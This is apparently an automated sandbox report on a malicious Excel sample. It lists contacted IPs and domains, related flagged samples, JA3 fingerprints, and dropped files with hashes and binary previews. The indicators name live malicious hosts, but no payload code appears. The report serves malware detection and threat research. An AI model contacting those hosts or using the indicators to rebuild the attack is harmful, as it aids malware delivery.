                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v2F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/macF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.aiF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.comF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devicesF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.F29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorizeF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.aiF29B1D57-CE95-4888-B145-4A6EF177D137.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  192.185.39.58
                                                                                                                                                  signifysystem.comUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                  192.185.32.232
                                                                                                                                                  fcventasyservicios.clUnited States
                                                                                                                                                  46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:412660
                                                                                                                                                  Start date:12.05.2021
                                                                                                                                                  Start time:20:58:57
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 27s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:0b31c0f0_by_Libranalysis.xls
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:30
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal76.expl.evad.winXLS@5/6@2/2
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xls
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  192.185.39.580b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                    090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                      090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                        54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                            afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                              afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                  8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                    32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                      32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                        9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                            46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                              192.185.32.2320b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                            8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                  32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                    9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                      46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                        46747509_by_Libranalysis.xlsGet hashmaliciousBrowse

                                                                                                                                                                                                          Domains

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                          signifysystem.com090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          fcventasyservicios.cl0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232

                                                                                                                                                                                                          ASN

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                          UNIFIEDLAYER-AS-1US0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          SWIFT COPY.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.171.219
                                                                                                                                                                                                          d6U17S2KY1.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 67.20.76.71
                                                                                                                                                                                                          statistic-482095214.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.254.186.229
                                                                                                                                                                                                          statistic-482095214.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.254.186.229
                                                                                                                                                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.254.185.244
                                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.232.222.43
                                                                                                                                                                                                          UNIFIEDLAYER-AS-1US0b31c0f0_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          SWIFT COPY.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.171.219
                                                                                                                                                                                                          d6U17S2KY1.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 67.20.76.71
                                                                                                                                                                                                          statistic-482095214.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.254.186.229
                                                                                                                                                                                                          statistic-482095214.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.254.186.229
                                                                                                                                                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.254.185.244
                                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.232.222.43

                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19#Ud83d#Udce0Lori's Fax VM-002.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          statistic-482095214.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          090811fa_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          54402971_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          afdab907_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          8100c344_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          32154f4c_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          9659e9a8_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          46747509_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          LMNF434.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          SF65G55121E0FE25552.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          catalog-1908475637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          rF27d1O1O2.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          cSvu8bTzJU.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          Contract_kyrgyzstan_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          DHL_988121.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          SMC PO 1083 SAJ 1946 .exeGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58
                                                                                                                                                                                                          catalog-949138716.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                          • 192.185.32.232
                                                                                                                                                                                                          • 192.185.39.58

                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\F29B1D57-CE95-4888-B145-4A6EF177D137
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):134558
                                                                                                                                                                                                          Entropy (8bit):5.36839563671284
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:VcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:KEQ9DQW+zPXO8
                                                                                                                                                                                                          MD5:D6163E58F480C545326A329021BB8E79
                                                                                                                                                                                                          SHA1:AE385DF175D9B322204EC6D4544EACB8047F0B75
                                                                                                                                                                                                          SHA-256:D788207406D6A6FFC22DF202C77C64E0F07F72DF73C9C4EEF06382EAFEE5100E
                                                                                                                                                                                                          SHA-512:C640354A8DF5FEFB987B8E22FE3DCA322E08CCA8329E679E2A794BE7B91BFF955E5AAFD0E495DDD12CE9FABEE0518A06D3DD3B8E243D7BD63152AEB0AB2E1A0D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-12T19:00:47">.. Build: 16.0.14108.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\B6A10000
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):81547
                                                                                                                                                                                                          Entropy (8bit):7.9104281178471085
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:BWjYO+nffSDcn9iZtJOXAQR2KtCbuMB/yDL4kymYBO0y7zBr4ZLJP8J:E+nHSD8YZo/Uh0ZymYQ0y7FALOJ
                                                                                                                                                                                                          MD5:E37D9DFC30D55AA9F89CC238CE3EC04D
                                                                                                                                                                                                          SHA1:D973A49AA42C2B7AB4548C94F9030FE0F1E7D046
                                                                                                                                                                                                          SHA-256:2F3943B3FC2B1038E78444A291B786B3B14AB9BCD1043E957A785F02B643B261
                                                                                                                                                                                                          SHA-512:589DF9D1760B0A8C847DDB5B8DF14B82F67018E3AE5294CF67C4B68BD530E6045AEC1B98F9C021AD76C61B5DB5EF0242F139C47340B83EE1031700C2B6949CD0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: .U.N#1..#.?.|.u;p..Q:.f.. .|.cW..x..@......ek....R....jaM....w-;oF..'..k......U..S.x.-[.......2.V.v.>..s.=X....hf...^c..s.....~q.]...9.d..f...zA.+'S.X.g.].j...h)...ON}...l.%(/.-Q7."..=@...Q.b....0d|.fp.'Mm..<.....0....B.R....RX;.........Q+..DL..RZ|a......f?I..b....).5V.....9...=J........I.._.....Q|.5....=T.bH._...k..vSQF.-....^..._.9.#....."=....>Q[...{..>T...._?....h......R..0<.....u ".I..m...E..'/7.CB....4y.......PK..........!..!.9............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\0b31c0f0_by_Libranalysis.xls.LNK
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:46 2020, mtime=Thu May 13 03:00:50 2021, atime=Thu May 13 03:00:50 2021, length=177152, window=hide
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2250
                                                                                                                                                                                                          Entropy (8bit):4.6792466706636064
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:8v3OEEw7N/3OEqG9B6pv3OEEw7N/3OEqG9B6:8v3F9N/3Fx9Kv3F9N/3Fx9
                                                                                                                                                                                                          MD5:9F362A00CE265C5270383D40C9B6190A
                                                                                                                                                                                                          SHA1:65F21F45AE34E89621248F8547A0807742CB99C0
                                                                                                                                                                                                          SHA-256:EFAD22BFF04D9DBC8F87952615E35DCC908FF4481EA983171A667CD2CAE699DA
                                                                                                                                                                                                          SHA-512:1AAF8C57CA7E342A8B6F1541009A36ACD93163C3BB08273D69B485F61214532CB7E4384DB0AEABF86880A51EDB79BD5A30F1DC8EF4997F91CFACF42BEC15A672
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview: L..................F.... .....t.:....P"..G...P"..G...............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R. ....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qyx..user.<.......Ny..R. .....S........................h.a.r.d.z.....~.1.....>Qzx..Desktop.h.......Ny..R. .....Y..............>.....o.f.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R. .0B31C0~1.XLS..j......>Qxx.R. ....h.....................y.u.0.b.3.1.c.0.f.0._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......b...............-.......a...........>.S......C:\Users\user\Desktop\0b31c0f0_by_Libranalysis.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.0.b.3.1.c.0.f.0._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...As...`.......X.......841675...........!a..%.H.VZAj...p..-.........-..!a..%.H.VZAj...p..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.
                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Thu May 13 03:00:50 2021, atime=Thu May 13 03:00:50 2021, length=12288, window=hide
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):904
                                                                                                                                                                                                          Entropy (8bit):4.65049935438516
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:8A5DycXU1iuElPCH2JgpjmYzkl+WrjAZ/2bDyl5LC5Lu4t2Y+xIBjKZm:8uyXpjKzAZiDyq87aB6m
                                                                                                                                                                                                          MD5:A02BD33F71E7A6421842437FE3CE3785
                                                                                                                                                                                                          SHA1:2FCFA12AEB8728F8C68D0D1FFF0BF643F9F2AB0A
                                                                                                                                                                                                          SHA-256:3936162217C7BC8FC0E68BFBD03106295B759A87645492BB98A0CBA40887FF05
                                                                                                                                                                                                          SHA-512:4BE8EC96F7624B24C271D6A7D34CCA6EC24E4886FA6D6E1311CFA143668233C478DD65D7AB76479F5ABA475755ADF77D703877BB7A8BF8E988364DAF0BE6E714
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
